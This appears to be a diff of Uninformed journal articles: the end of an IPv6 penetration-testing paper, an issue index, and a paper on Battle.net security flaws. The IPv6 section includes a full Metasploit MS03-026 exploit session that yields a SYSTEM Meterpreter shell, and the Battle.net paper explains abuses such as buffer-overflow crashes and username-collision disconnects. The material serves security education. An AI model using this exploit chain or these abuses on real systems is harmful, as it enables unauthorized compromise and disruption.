this to Nikto, Nikto is unable to process the scope ID suffix. The solution to
|
||||
this and many other tool compatibility issues is to use a TCPv4 to TCPv6 proxy
|
||||
service. By far, the easiest tool for the job is Socat, which is available as
|
||||
a package on most Linux and BSD distributions. To relay local port 8080 to
|
||||
remote port 80 on a link-local IPv6 address, we use a command like the one
|
||||
below:
|
||||
|
||||
$ socat TCP-LISTEN:8080,reuseaddr,fork TCP6:[fe80::24c:44ff:fe4f:1a44%eth0]:80
|
||||
|
||||
Once Socat is running, we can launch Nikto and many other tools against port
|
||||
8080 on 127.0.0.1.
|
||||
|
||||
$ ./nikto.pl -host 127.0.0.1 -port 8080
|
||||
- Nikto v2.03/2.04
|
||||
---------------------------------------------------------------------------
|
||||
+ Target IP: 127.0.0.1
|
||||
+ Target Hostname: localhost
|
||||
+ Target Port: 8080
|
||||
+ Start Time: 2008-10-01 12:57:18
|
||||
---------------------------------------------------------------------------
|
||||
+ Server: Microsoft-IIS/6.0
|
||||
|
||||
This port forwarding technique works for many other tools and protocols and is
|
||||
a great fall-back when the tool of choice does not support IPv6 natively.
|
||||
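For situations where Socat is not available, the relay itself is small enough to sketch in Python. This is not Socat's implementation, only a minimal thread-per-connection equivalent of the command above. The function names pipe, handle, and relay are ours, and the sketch assumes a platform whose resolver accepts the "%eth0" suffix in the target host string.

```python
import socket
import threading


def pipe(src, dst):
    """Copy bytes from src to dst until src reaches end-of-stream."""
    while True:
        chunk = src.recv(4096)
        if not chunk:
            break
        dst.sendall(chunk)
    try:
        dst.shutdown(socket.SHUT_WR)  # pass the end-of-stream along
    except OSError:
        pass  # the peer may already have closed the connection


def handle(client, target_host, target_port):
    """Connect to the IPv6 target and shuttle data in both directions."""
    upstream = socket.create_connection((target_host, target_port))
    forward = threading.Thread(target=pipe, args=(client, upstream), daemon=True)
    forward.start()
    pipe(upstream, client)
    forward.join()
    client.close()
    upstream.close()


def relay(listen_port, target_host, target_port):
    """Accept IPv4 connections on 127.0.0.1 and relay each to the target."""
    with socket.create_server(("127.0.0.1", listen_port)) as server:
        while True:
            client, _address = server.accept()
            threading.Thread(
                target=handle,
                args=(client, target_host, target_port),
                daemon=True,
            ).start()


# Example call mirroring the socat command above (runs until interrupted):
# relay(8080, "fe80::24c:44ff:fe4f:1a44%eth0", 80)
```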
|
||||
4.4) Exploiting IPv6 Services
|
||||
|
||||
The Metasploit Framework has native support for IPv6 sockets, including the
|
||||
local scope ID. This allows nearly all of the exploit and auxiliary modules to
|
||||
be used against IPv6 hosts with no modification. In the case of web
|
||||
application exploits, the VHOST parameter can be used to override the Host
|
||||
header sent by the module, avoiding issues like the one described above.
|
||||
|
||||
4.5) IPv6 Enabled Shellcode
|
||||
|
||||
To restrict all exploit activity to the IPv6 protocol, not only do the
|
||||
exploits need support for IPv6, but the payloads as well. IPv6 payload support
|
||||
is available in Metasploit through the use of "stagers". These stagers can be
|
||||
used to chain-load any of the common Windows payloads included with the
|
||||
Metasploit Framework. Once again, link-local addresses make this process a
|
||||
little more complicated. When using the bind_ipv6_tcp stager to open a listening
|
||||
port on the target machine, the RHOST parameter must have the local scope ID
|
||||
appended. By the same token, the reverse_ipv6_tcp stager requires that the LHOST
|
||||
variable have the remote machine's interface number appended as a scope ID. This
|
||||
can be tricky, since the attacker rarely knows what interface number a given
|
||||
link-local address corresponds to. For this reason, the bind_ipv6_tcp stager is
|
||||
ultimately more useful for exploiting Windows machines with link-local
|
||||
addresses. The example below demonstrates using the bind_ipv6_tcp stager with
|
||||
the Meterpreter stage. The exploit in this case is MS03-026 (Blaster) and is
|
||||
delivered over the DCERPC endpoint mapper service on port 135.
|
||||
|
||||
msf> use windows/exploit/dcerpc/ms03_026_dcom
|
||||
msf exploit(ms03_026_dcom) > set RHOST fe80::24c:44ff:fe4f:1a44%eth0
|
||||
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_ipv6_tcp
|
||||
msf exploit(ms03_026_dcom) > set LPORT 4444
|
||||
msf exploit(ms03_026_dcom) > exploit
|
||||
[*] Started bind handler
|
||||
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
|
||||
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:[...]
|
||||
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:[...][135]
|
||||
[*] Sending exploit ...
|
||||
[*] The DCERPC service did not reply to our request
|
||||
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
|
||||
[*] Sending stage (2650 bytes)
|
||||
[*] Sleeping before handling stage...
|
||||
[*] Uploading DLL (73227 bytes)...
|
||||
[*] Upload completed.
|
||||
[*] Meterpreter session 1 opened
|
||||
msf exploit(ms03_026_dcom) > sessions -i 1
|
||||
[*] Starting interaction with 1...
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
|
||||
5) Summary
|
||||
|
||||
5.1) Key Concepts
|
||||
|
||||
Even though most networks are not "IPv6" ready, many of the machines on those
|
||||
networks are. The introduction of a new protocol stack introduces security
|
||||
challenges that are not well-known and often overlooked during security
|
||||
evaluations. The huge address range of IPv6 makes remote discovery of IPv6
|
||||
machines difficult, but local network discovery is still possible using the
|
||||
all-nodes broadcast addresses. Link-local addresses are tied to a specific
|
||||
network link and are only guaranteed unique on that network link where they
|
||||
reside. In order to communicate with an IPv6 node using a link-local address,
|
||||
the user must have knowledge of the local scope ID (interface) for that link.
|
||||
In order for a remote application to connect back to the user over a
|
||||
link-local address, the socket code must specify the local scope ID of the
|
||||
correct interface. UDP services which listen on the IPv6 ANY address (::0)
|
||||
will respond to client requests that are sent to the all-nodes broadcast
|
||||
address (FF02::1), which differs from IPv4. IPv6 broadcast traffic is not
|
||||
routable, which limits many attacks to the local network only. Even though
|
||||
many flavors of Linux, BSD, and Windows now enable IPv6 by default, not all
|
||||
applications support listening on the IPv6 interfaces. Software firewalls
|
||||
often allow IPv6 traffic even when configured to block all IPv4 traffic.
|
||||
Immunity CANVAS, the Metasploit Framework, the Nmap Security Scanner, and many
|
||||
other security tools now support IPv6 targets. It is possible to use a tool
|
||||
written for IPv4 against an IPv6 host by using a socket relay tool such as
|
||||
xinetd or socat.
|
||||
|
||||
5.2) Conclusion
|
||||
|
||||
Although the IPv6 backbone infrastructure continues to grow and an increasing
|
||||
number of client systems and devices support IPv6 out of the box, few ISPs are
|
||||
able to provide routing between the customer site and the backbone. Until this
|
||||
gap is closed, security assessments against IPv6 addresses will be limited to
|
||||
the local network. The lack of awareness about IPv6 in most organizations can
|
||||
provide an easy way for an attacker to bypass network controls and fly under
|
||||
the radar of many security monitoring tools. After all, when confronted with
|
||||
the message below, what is an administrator to do?
|
||||
|
||||
References
|
||||
|
||||
Exploits
|
||||
- THC IPv6 Attack Toolkit - http://freeworld.thc.org/thc-ipv6/
|
||||
- The Metasploit Framework - http://metasploit.com
|
||||
- Immunity CANVAS - http://www.immunitysec.com/
|
||||
Tools
|
||||
- ncat - svn co svn://svn.insecure.org/ncat (login: guest/guest)
|
||||
- socat - http://www.dest-unreach.org/socat/
|
||||
- scapy - http://www.secdev.org/projects/scapy/
|
||||
- nmap - http://nmap.org/
|
||||
- nikto - http://www.cirt.net/nikto2
|
||||
Documentation
|
||||
- RFC 2461 - http://www.ietf.org/rfc/rfc2461.txt
|
||||
- Official IPv6 Site - http://www.ipv6.org/
|
||||
Application Compatibility
|
||||
- http://www.deepspace6.net/docs/ipv6statuspageapps.html
|
||||
- http://www.stindustries.net/IPv6/tools.html
|
||||
- http://www.ipv6.org/v6-apps.html
|
||||
- http://applications.6pack.org/browse/support/
|
24
uninformed/10.txt
Normal file
|
@ -0,0 +1,24 @@
|
|||
|
||||
|
||||
Engineering in Reverse
|
||||
Can you find me now? Unlocking the Verizon Wireless xv6800 (HTC Titan) GPS
|
||||
Skywing
|
||||
In August 2008 Verizon Wireless released a firmware upgrade for their xv6800 (rebranded HTC Titan) line of Windows Mobile smartphones that provided a number of new features previously unavailable on the device on the initial release firmware. In particular, support for accessing the device's built-in Qualcomm gpsOne assisted GPS chipset was introduced with this update. However, Verizon Wireless elected to attempt to lock down the GPS hardware on xv6800 such that only applications authorized by Verizon Wireless would be able to access the device's built-in GPS hardware and perform location-based functions (such as GPS-assisted navigation). The mechanism used to lock down the GPS hardware is entirely client-side based, however, and as such suffers from fundamental limitations in terms of how effective the lockdown can be in the face of an almost fully user-programmable Windows Mobile-based device. This article outlines the basic philosophy used to prevent unauthorized applications from accessing the GPS hardware and provides a discussion of several of the flaws inherent in the chosen design of the protection mechanism. In addition, several pitfalls relating to debugging and reverse engineering programs on Windows Mobile are also discussed. Finally, several suggested design alterations that would have mitigated some of the flaws in the current GPS lock down system from the perspective of safeguarding the privacy of user location data are also presented.
|
||||
pdf | html | txt
|
||||
|
||||
Using dual-mappings to evade automated unpackers
|
||||
skape
|
||||
Automated unpackers such as Renovo, Saffron, and Pandora's Bochs attempt to dynamically unpack executables by detecting the execution of code from regions of virtual memory that have been written to. While this is an elegant method of detecting dynamic code execution, it is possible to evade these unpackers by dual-mapping physical pages to two distinct virtual address regions where one region is used as an editable mapping and the second region is used as an executable mapping. In this way, the editable mapping is written to during the unpacking process and the executable mapping is used to execute the unpacked code dynamically. This effectively evades automated unpackers which rely on detecting the execution of code from virtual addresses that have been written to.
|
||||
|
||||
|
||||
Exploitation Technology
|
||||
Analyzing local privilege escalations in win32k
|
||||
mxatone
|
||||
This paper analyzes three vulnerabilities that were found in win32k.sys that allow kernel-mode code execution. The win32k.sys driver is a major component of the GUI subsystem in the Windows operating system. These vulnerabilities have been reported by the author and patched in MS08-025. The first vulnerability is a kernel pool overflow with an old communication mechanism called the Dynamic Data Exchange (DDE) protocol. The second vulnerability involves improper use of the ProbeForWrite function within string management functions. The third vulnerability concerns how win32k handles system menu functions. Their discovery and exploitation are covered.
|
||||
|
||||
|
||||
Exploiting Tomorrow's Internet Today: Penetration testing with IPv6
|
||||
H D Moore
|
||||
This paper illustrates how IPv6-enabled systems with link-local and auto-configured addresses can be compromised using existing security tools. While most of the techniques described can apply to "real" IPv6 networks, the focus of this paper is to target IPv6-enabled systems on the local network.
|
||||
|
||||
|
453
uninformed/2.1.txt
Normal file
|
@ -0,0 +1,453 @@
|
|||
Inside Blizzard: Battle.net
|
||||
Skywing
|
||||
skywinguninformed@valhallalegends.com
|
||||
Last modified: 8/31/2005
|
||||
|
||||
1) Foreword
|
||||
|
||||
Abstract: This paper intends to describe a variety of the problems Blizzard
|
||||
Entertainment has encountered from a practical standpoint through their
|
||||
implementation of the large-scale online game matchmaking and chat service,
|
||||
Battle.net. The paper provides some background historical information into
|
||||
the design and purpose of Battle.net and continues on to discuss a variety of
|
||||
flaws that have been observed in the implementation of the system. Readers
|
||||
should come away with a better understanding of problems that can be easily
|
||||
introduced in designing a matchmaking/chat system to operate on such a large
|
||||
scale in addition to some of the serious security-related consequences of not
|
||||
performing proper parameter validation of untrusted clients.
|
||||
|
||||
|
||||
2) Introduction
|
||||
|
||||
First, a bit of historical and background information, leading up to the
|
||||
present day. Battle.net is an online matchmaking service that allows players
|
||||
to set up online games with other players. It is quite possibly the oldest
|
||||
and largest system of its kind currently in existence (launched in 1997).
|
||||
|
||||
The basic services provided by Battle.net are game matchmaking and chat. The
|
||||
matchmaking system allows one to create and join games with little or no prior
|
||||
configuration required (other than picking game parameters, such as a map to
|
||||
play on, and so forth). The chat system is similar to a stripped-down version
|
||||
of Internet Relay Chat. The primary differences between IRC and Battle.net
|
||||
(for the purposes of the chat system) are that Battle.net only allows a user
|
||||
to be present in one chat channel at once, and many of the channel parameters
|
||||
that IRC users might be familiar with (maximum number of users in the channel,
|
||||
who has channel operator privileges) are fixed to well-defined values by the
|
||||
server.
|
||||
|
||||
Battle.net supports a wide variety of Blizzard games, including Diablo,
|
||||
Starcraft, Warcraft II: Battle.net Edition, Diablo II, and Warcraft III. In
|
||||
addition, there are shareware versions of Diablo and Starcraft that are
|
||||
supported on Battle.net, as well as optional expansions for Diablo II,
|
||||
Starcraft, and Warcraft III. All of these games share a common binary
|
||||
communication protocol that has evolved over the past 8 years, although
|
||||
different games have differing capabilities with respect to the protocol.
|
||||
|
||||
In some cases, this is due to differing requirements for the game clients, but
|
||||
usually this is simply due to the older programs not being updated as
|
||||
frequently as newer versions. In short, there are a number of different
|
||||
dialects of the Battle.net binary protocol that are used by the various
|
||||
supported products, all at the same time. In addition to supporting an
|
||||
undocumented binary protocol, Battle.net has for some time now supported a
|
||||
text-based protocol (the ``Chat Gateway'', as officially documented). This
|
||||
protocol supports a limited subset of the features available to clients using
|
||||
the full game protocol. In particular, it lacks support for capabilities such
|
||||
as account creation and management.
|
||||
|
||||
Both of these protocols are now fairly well understood and documented by certain
|
||||
persons outside of Blizzard. Although the text-based protocol is documented
|
||||
and fairly stable, the limitations inherent in it make it undesirable for many
|
||||
uses. Furthermore, in order to help stem the flood of spam on Battle.net,
|
||||
Blizzard changed their server software to prevent clients using the text-based
|
||||
protocol from entering all but a few pre-defined chat channels. As a result
|
||||
of this, many developers have reverse engineered (or more commonly, used the
|
||||
work of those who came before them) the Battle.net binary protocol and written
|
||||
their own "emulator" clients for various purposes (typically as a better
|
||||
alternative to the limited chat facilities provided by Blizzard's game
|
||||
clients). These clients emulate the behavior of a particular Blizzard game
|
||||
program in order to trick Battle.net into providing the services typically
|
||||
only offered to the game clients, hence the name ``emulator client''. Most of
|
||||
these clients are referred to as ``emulator bots'' or ``emubots'' by their
|
||||
developers, and the Battle.net community in general. In fact, there are also
|
||||
partially compliant server implementations that implement the server-side chat
|
||||
and matchmaking logic supported by Battle.net to varying degrees of accuracy.
|
||||
One can today download a third party server that emulates the Battle.net
|
||||
protocol, and a third party client that emulates a Blizzard client supporting
|
||||
the Battle.net protocol, and have the two inter-operate.
|
||||
|
||||
|
||||
3) Battle.net issues
|
||||
|
||||
By virtue of supporting so many different game clients (at present, there are
|
||||
11 distinct Blizzard-supported programs that connect to Battle.net), Blizzard
|
||||
has a sizable version-control problem. In fact, this problem is compounded by
|
||||
several issues.
|
||||
|
||||
First, many client game patches add or change the protocol in significant
|
||||
ways. For instance, the notion of password-protected, persistent player
|
||||
accounts was not originally even designed into Battle.net, and was added at a
|
||||
later date via a client patch (and server-side modifications).
|
||||
|
||||
On top of that, many clients also have very significant differences in feature
|
||||
support. To give an example, for many years Diablo and Diablo Shareware were
|
||||
both supported on Battle.net concurrently while Diablo supported user accounts
|
||||
and the shareware version did not. As one can imagine, this sort of thing can
|
||||
give rise to a great many problems. The version control and update mechanism
|
||||
is not separate from the rest of the protocol. Indeed, the same server, and
|
||||
the same connection, are used for version control, but a different connection
|
||||
to the same server is used for the transfer of client patches. As a result,
|
||||
any compliant Battle.net server is required to support not only the current
|
||||
Battle.net protocol version that is in use by the current patch level of every
|
||||
existing client, but it must also support the first few messages used by every
|
||||
single version of every single Battle.net client ever released, or at least
|
||||
until the version checking mechanism can be invoked to distribute a new
|
||||
version (which is not the first task that occurs in some older iterations of
|
||||
the protocol).
|
||||
|
||||
To make matters worse, there is now a proliferation of third party clients
|
||||
using the Battle.net protocol (to varying degrees of accuracy compared to the
|
||||
Blizzard game clients they attempt to emulate) in use on Battle.net today.
|
||||
This began sometime in mid-1999 when a program called ``NBBot'', authored by
|
||||
Andreas Hansson, who often goes by the handle ``Adron'', entered widespread
|
||||
distribution, though this was not the intent of the author. NBBot was the
|
||||
first third party client to emulate the Battle.net protocol to an extent that
|
||||
allowed it to masquerade as a game client. Several years later, the source
|
||||
code for this program was inadvertently released to wide-spread public
|
||||
distribution, which kicked off large-scale development of third party
|
||||
Battle.net protocol clients by a number of authors.
|
||||
|
||||
Despite all of these challenges, Blizzard has managed to keep Battle.net up
|
||||
and running for nearly a decade now, and claims over a million active users.
|
||||
However, the road leading up to the present day has not been ``clear sailing''
|
||||
for Blizzard. This leads us into some of the specific problems facing
|
||||
Battle.net leading up until the present day. One of the major classes of
|
||||
problems encountered by Blizzard as Battle.net has grown is that it was (in
|
||||
the author's opinion) simply not designed to support the circumstances in
|
||||
which it eventually ended up being used. This is evident in a variety of
|
||||
events that have occurred over the past few years:
|
||||
|
||||
- The addition of persistent player accounts to the system.
|
||||
- The addition of the text-based chat protocol to the system.
|
||||
- Significant changes to the backend architecture utilized by
|
||||
Battle.net.
|
||||
|
||||
Although it is difficult to provide exact details of these changes, having not
|
||||
worked at Blizzard, many of them can be inferred.
|
||||
|
||||
|
||||
3.1) Network issues
|
||||
|
||||
Battle.net was originally set up as a small number of linked servers placed at
|
||||
various strategic geographical locations. They were ``linked'' in the sense
|
||||
that players on one server could interact with players on a different server
|
||||
as seamlessly as with players connected to the same server. This architecture
|
||||
eventually proved unsupportable, as increasing usage of Battle.net led to the
|
||||
common occurrence of "server splits", in which one or more servers would be
|
||||
unable to keep up with the rest of the network and become temporarily
|
||||
disconnected.
|
||||
|
||||
Eventually, the system was split into two separate networks (each starting
|
||||
with a copy of all account and player data present at the time of the
|
||||
division): The Asian network, and United States and European network. Each
|
||||
network was comprised of a number of different servers that players could
|
||||
connect to in an optimized fashion based on server response time.
|
||||
|
||||
Some time later, even this system proved untenable. The network was once
|
||||
again permanently fragmented, this time splitting the United States and
|
||||
European network into three subnetworks. This is the topology retained today,
|
||||
with the networks designated ``USEast'', ``USWest'', ``Europe'', ``Asia''. It
|
||||
is believed that all servers in a server network (also referred to as a
|
||||
``cluster'' or ``gateway'') are, at present, located at the same physical
|
||||
hosting facility on a high-speed LAN.
|
||||
|
||||
As new game requirements came about, a new architecture for Diablo II and
|
||||
Warcraft III was required. In these cases, games are hosted on
|
||||
Blizzard-operated servers and not on client machines in order to make them
|
||||
more resilient to attempts to hack the game to gain an unfair advantage.
|
||||
There are significant differences to how this is implemented for Diablo II and
|
||||
Warcraft III, and it is not used for certain types of games in Warcraft III.
|
||||
This resulted in a significant change to the way the service performs its
|
||||
primary function, that is, game matchmaking.
|
||||
|
||||
|
||||
3.2) Client/Server issues
|
||||
|
||||
Aside from the basic network design issues, other problems have arisen from
|
||||
the fact that Blizzard did not expect, or intend for, third party programs to
|
||||
use its Battle.net protocol. As a result, proper validation has not always
|
||||
been in place for certain conditions that would not be generated through the
|
||||
Blizzard client software.
|
||||
|
||||
As mentioned earlier, many developers eventually turned to using the
|
||||
Battle.net protocol directly as opposed to the text-based protocol in order to
|
||||
circumvent certain limitations in the text-based protocol. There are a number
|
||||
of reasons for this. Historically, clients utilizing the Battle.net protocol
|
||||
have been able to enter channels that are already full (private channels on
|
||||
Battle.net have a limit of 40 users, normally), and have been able to perform
|
||||
various account management functions (such as creating accounts, changing
|
||||
passwords, managing user profile information, and so forth) that are not
|
||||
doable through the text-based protocol.
|
||||
|
||||
In addition to having access to extended protocol-level functionality, clients
|
||||
using the Battle.net protocol are permitted to open up to eight connections to
|
||||
a single Battle.net network per IP address (as opposed to the text-based
|
||||
protocol, which only allows a single connection per IP address). This limit
|
||||
was originally four connections per IP address, and was raised after NATs,
|
||||
particularly in cyber cafes, gained popularity.
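
The per-address limits described above could be enforced with a simple counter keyed on the source address. The following is a minimal sketch and not Blizzard's implementation: the class name and protocol labels are hypothetical, and only the limits of eight and one come from the text. Whether the two protocols shared a single counter is not stated, so the sketch counts them separately as an assumption.

```python
from collections import Counter

# Limits taken from the text; the protocol labels are illustrative names.
MAX_CONNECTIONS = {"binary": 8, "text": 1}


class ConnectionLimiter:
    """Tracks open connections per (protocol, IP address) pair."""

    def __init__(self):
        self.open_connections = Counter()

    def try_connect(self, protocol, ip):
        key = (protocol, ip)
        if self.open_connections[key] >= MAX_CONNECTIONS[protocol]:
            return False  # over the per-address limit, refuse the connection
        self.open_connections[key] += 1
        return True

    def disconnect(self, protocol, ip):
        key = (protocol, ip)
        if self.open_connections[key] > 0:
            self.open_connections[key] -= 1
```

A limiter of this kind treats every client behind one NAT as a single address, which is consistent with the limit having been raised once shared addresses became common.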
|
||||
|
||||
This was particularly attractive to a number of persons on Battle.net who used
|
||||
third-party chat clients for a variety of reasons. The primary reason was
|
||||
generally that the same ``channel war'' phenomenon that has historically plagued
|
||||
IRC was also rather prevalent on Battle.net, and being able to field a large
|
||||
number of clients per IP address was seen as a significant advantage.
|
||||
|
||||
Due to the prevalence of ``channel wars'' on Battle.net, artificially large
|
||||
numbers of third-party clients utilizing the Battle.net protocol came into
|
||||
use. Although it is difficult to estimate the exact number of users of such
|
||||
clients, the author has observed upwards of several thousand being logged on
|
||||
to the service at once.
|
||||
|
||||
The development and usage of said third party clients has resulted in the
|
||||
discovery of a number of other issues with Battle.net. While most of the
|
||||
issues covered here are either already fixed or relatively minor, there is
|
||||
still value in discussing them.
|
||||
|
||||
|
||||
3.2.1) Client connection limits
|
||||
|
||||
Through the use of certain messages in the Battle.net protocol, it is possible
|
||||
to enter a channel beyond the normal 40 user limit. This was due to the fact
|
||||
that the method a game client would use to return to a chat channel after
|
||||
leaving a game would not properly check the user count. After miscreants
|
||||
exploited this vulnerability to put thousands of users into one channel, which
|
||||
subsequently led to server crashes, Blizzard finally fixed this
|
||||
vulnerability.
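
The general remedy for this class of bug is to route every way of entering a channel through one check. The sketch below assumes a hypothetical Channel class with two entry paths; the names are illustrative and say nothing about how the real server is organized.

```python
CHANNEL_LIMIT = 40  # normal private-channel limit given in the text


class ChannelFull(Exception):
    pass


class Channel:
    def __init__(self, name):
        self.name = name
        self.users = []

    def _add(self, user):
        # Single choke point: every entry path performs the same count check.
        if len(self.users) >= CHANNEL_LIMIT:
            raise ChannelFull(self.name)
        self.users.append(user)

    def join(self, user):
        self._add(user)

    def return_from_game(self, user):
        # The flawed path described above reportedly skipped the count check.
        self._add(user)
```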
|
||||
|
||||
|
||||
3.2.2) Chat message server overflow
|
||||
|
||||
The server software often assumed that the client would only perform 'sane'
|
||||
actions, and one of these assumptions dealt with how long of a chat message a
|
||||
client could send. The server apparently copied a chat message indicated by a
|
||||
Battle.net protocol client into a fixed 512-byte buffer without proper length
|
||||
checking, such that a client could crash a server by sending a long enough
|
||||
message. Due to the fact that Blizzard's server binaries are not publicly
|
||||
available, it would not have been easy to exploit this flaw to run arbitrary
|
||||
code on the server. This serious vulnerability was fixed within a day of
|
||||
being reported.
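
The missing check amounts to comparing the message length against the buffer size before copying. A minimal sketch follows, assuming the 512-byte buffer must also hold a terminating NUL byte (an assumption; the text gives only the buffer size) and using a hypothetical function name.

```python
CHAT_BUFFER_SIZE = 512  # fixed buffer size mentioned in the text


def accept_chat_message(payload: bytes) -> bytes:
    """Return the payload if it fits the buffer with room for a NUL, else reject it."""
    if len(payload) >= CHAT_BUFFER_SIZE:
        raise ValueError("chat message too long")
    return payload
```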
|
||||
|
||||
|
||||
3.2.3) Client authentication
|
||||
|
||||
Aside from general sanity checks, Blizzard also has had some issues relating
|
||||
to authentication. Blizzard currently has two systems in use for user account
|
||||
password authentication. In order to create a third party client, these
|
||||
systems had to be understood and third party implementations produced. This
|
||||
has revealed several flaws in their implementation.
|
||||
|
||||
The first system Blizzard utilizes is a challenge-response system that uses a
|
||||
SHA-1 hash of the client's password. The game client implementation of this
|
||||
system lowercases the entire password string before hashing it, significantly
|
||||
reducing password security. (A third party client could opt not to do this,
|
||||
and as such create an account that is impossible to log on to through the
|
||||
official Blizzard game clients or the text-based protocol. The text-based
|
||||
protocol sends a user's password in cleartext, after which the server
|
||||
lowercases the password and internally compares a hash of it with the account
|
||||
in question's password in a database.) However, a more serious security
|
||||
problem remains: in SHA-1, there are a number of bit rotate left (``ROL'')
|
||||
operations. The Blizzard programmer responsible for implementing this
|
||||
apparently switched the two parameters in every call to ROL. That is, if
|
||||
there was a ``#define ROL(a, b) (...)'' macro, the programmer swapped the two
|
||||
arguments. This drastically reduces the security of Battle.net password
|
||||
hashes, as most of the data being hashed ends up being zero bits. Because of
|
||||
the problem of incompatibility with previously created accounts, this system
|
||||
is still in use today.
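
The effect of exchanging the operands of a rotate can be seen in isolation. The sketch below is not the Battle.net hash. It only compares a 32-bit rotate with the same call made with its arguments swapped, and it assumes the rotate count is reduced modulo 32 (as x86 rotate instructions do). All function names are illustrative.

```python
MASK32 = 0xFFFFFFFF


def rol32(value, count):
    """Rotate a 32-bit value left by count bits (count is reduced modulo 32)."""
    count &= 31
    value &= MASK32
    return ((value << count) | (value >> (32 - count))) & MASK32


def rol32_swapped(value, count):
    """The same call with its two arguments exchanged."""
    return rol32(count, value)


def popcount(x):
    """Number of one bits in x."""
    return bin(x).count("1")
```

Because a rotation only moves bits around, rol32_swapped(w, 5) always has exactly two bits set (5 is binary 101) whatever the data word w is. The data word survives only as a rotate count, which is one way to see how swapped arguments can leave mostly zero bits.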
|
||||
|
||||
The second system Blizzard utilizes is one based off of SRP (Secure Remote
|
||||
Password, see http://srp.stanford.edu). Only Warcraft III and its expansion
|
||||
use this system for password authentication. This product has its own
|
||||
account namespace on Battle.net, so that there are no backwards compatibility
|
||||
issues with the older ``broken SHA-1'' method. It is worth noting that
|
||||
Warcraft III clients and older clients can still communicate via chat, however
|
||||
- the server imposes a namespace decoration to client account names for
|
||||
communication between namespaces, such that a client logged on as Warcraft III
|
||||
would see a user ``User'' logged on as Starcraft on the USEast Battle.net
|
||||
network as ``User@USEast''. However, this system is also flawed, albeit less
|
||||
severely. In particular, the endian-ness of calculations is reversed, but
|
||||
this is not properly accounted for in some parts of the implementation, such
|
||||
that some operations expecting to remove trailing zero bits instead remove
|
||||
leading zero bits after converting a large integer to a flat binary buffer.
|
||||
There is a second flaw, as well, although it does not negatively impact the
|
||||
security of the client: In some of the conversions from big numbers to flat
|
||||
buffers, the server does not properly zero out bytes if the big number does
|
||||
not occupy 32 non-zero bytes, and instead leaves uninitialized data in them.
|
||||
The result is that some authentication attempts will randomly fail. As far as
|
||||
the author knows, this bug is still present in Battle.net.
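
Both flaws concern the conversion of a large integer into a fixed-size byte buffer. The sketch below assumes a 32-byte buffer (the size given in the text) and uses hypothetical helper names. It shows a conversion that always zero-fills unused bytes, and why stripping zeros from the wrong end of a little-endian buffer changes the value.

```python
BUFFER_LEN = 32  # size of the flat buffer mentioned in the text


def to_flat_buffer(n, byteorder="little"):
    """Serialize n into exactly BUFFER_LEN bytes; unused bytes are zero."""
    return n.to_bytes(BUFFER_LEN, byteorder)


def strip_leading_zeros(buf):
    return buf.lstrip(b"\x00")


def strip_trailing_zeros(buf):
    return buf.rstrip(b"\x00")
```

In a little-endian buffer the insignificant high-order zero bytes sit at the end, so only trailing zeros may be dropped safely. For the value 0x0100, stripping trailing zeros leaves the two bytes 00 01, while stripping leading zeros removes the low-order byte and the remaining bytes no longer decode to the same number.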
|
||||
|
||||
|
||||
3.2.4) Client namespace spoofing
|
||||
|
||||
With the release of Warcraft III, a separate account namespace was provided
|
||||
for users of that product, as mentioned above. The server internally keeps
|
||||
track of a user's account name as ``x#username'', where x is a character specifying
|
||||
an alternate namespace (the only currently known namespace designation is 'w',
|
||||
for Warcraft III). This is known due to a message that exposes the internal
|
||||
unique name for a user to protocol clients. While the character '#' has never
|
||||
been permitted in account names, if a user logs on to the same account more
|
||||
than once, they are assigned a unique name of the format 'accountname#serial',
|
||||
where 'serial' is a number that is incremented according to how many duplicate
|
||||
logons of the same account there are. Due to a lack of parameter checking in
|
||||
the account creation process, it was at one time possible to create
|
||||
accounts, via a third party client, that were one character long (all of the
|
||||
official game clients do not allow the user to do this). For some time, such
|
||||
accounts confused the server into thinking that a user was actually on a
|
||||
different (non-existent) namespace, and thus allowed a user who logged on to a
|
||||
single character account more than once to become impossible to 'target' via
|
||||
any of the user management functions. For example, such a user could not be
|
||||
sent a private message, ignored, banned or kicked from a channel, or otherwise
|
||||
affected by any other commands that operate on a specific user. This was, of
|
||||
course, frequently abused to spam individuals with the victims being unable to
|
||||
stop the spammer (or even ignore them!). This problem has been fixed in the
|
||||
current server version.
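
The confusion can be illustrated with a deliberately naive parser. The sketch assumes '#' as the separator between a namespace prefix or account name and what follows it, and it assumes that any single character before the separator is read as a namespace. The server's real parsing logic is not known, and the function names are hypothetical.

```python
SEPARATOR = "#"  # assumed separator character


def duplicate_logon_name(account, serial):
    """Unique name given to a second or later logon of the same account."""
    return f"{account}{SEPARATOR}{serial}"


def parse_unique_name(unique_name):
    """Naive parse: a single character before the separator is taken as a namespace."""
    prefix, sep, rest = unique_name.partition(SEPARATOR)
    if sep and len(prefix) == 1:
        return {"namespace": prefix, "account": rest}
    return {"namespace": None, "account": unique_name}
```

Under these assumptions the second logon of a one-character account "a" parses as user "2" in a namespace "a" that does not exist, so commands that look the user up by name never find a target.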
|
||||
|
||||
|
||||
3.2.5) Username collisions
|
||||
|
||||
As referred to in the previous sub-section, for some time the server allowed
|
||||
Diablo Shareware clients. These clients did not log on to accounts, and
|
||||
instead simply assigned themselves a username. Normal procedures were
|
||||
followed if the username was already in use, which involved appending a serial
|
||||
number to the end to make a unique name. Besides the obvious problem of being
|
||||
able to impersonate someone to a user who was not clever enough to check what
|
||||
game type one was logged on as, this creates an additional vulnerability that
|
||||
was heavily exploited in ``channel wars''. If a server became split from the
|
||||
rest of the network due to load, one could log on to that server using Diablo
|
||||
Shareware, and pick the same name as someone logged on to the rest of the
|
||||
network using a different game type. When the server split was resolved, the
|
||||
server would notice that there were now two users with the same unique name,
|
||||
and disconnect both of them with the ``Duplicate username detected.'' message
|
||||
(this is synonymous with the ``colliding'' exploits of old that used to plague
|
||||
IRC). This could be used to force users offline any time a server split
|
||||
occurred. Being able to do so was desirable in the sense that there could
|
||||
normally only be one channel operator in a channel at a time (barring server
|
||||
splits, which could be used to create a second operator if the channel was
|
||||
entirely emptied and then recreated on the split server). When that operator
|
||||
left, the next person in line would be gifted with operator permissions
|
||||
(unless the operator had explicitly 'designated' a new heir for operator
|
||||
